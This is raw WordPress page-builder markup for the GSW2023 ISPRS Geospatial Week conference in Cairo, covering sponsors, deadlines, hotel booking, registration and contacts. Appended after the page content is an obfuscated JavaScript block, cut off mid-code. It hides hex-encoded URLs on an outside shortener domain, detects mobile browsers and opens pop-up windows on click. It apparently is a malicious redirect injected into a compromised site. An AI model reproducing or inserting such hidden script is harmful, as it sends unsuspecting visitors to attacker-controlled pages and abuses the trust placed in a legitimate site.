src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\" css=\".vc_custom_1684297727133{margin-top: 25px !important;}\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\"][vc_column][ultimate_heading main_heading=\"BOOK YOUR HOTEL NOW\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue </a></strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\"><strong>(InterContinental Cairo Semiramis)</strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Special Rate Booking is Opened Now</a></strong></span></h4>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h3></h3>\r\n<h3></h3>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong>\r\n\r\n<strong><del>April 15, 2023</del> ,</strong>\r\n\r\n<strong> May 15, 2023  (hard deadline, no extension)</strong>\r\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong>\r\n\r\n<strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 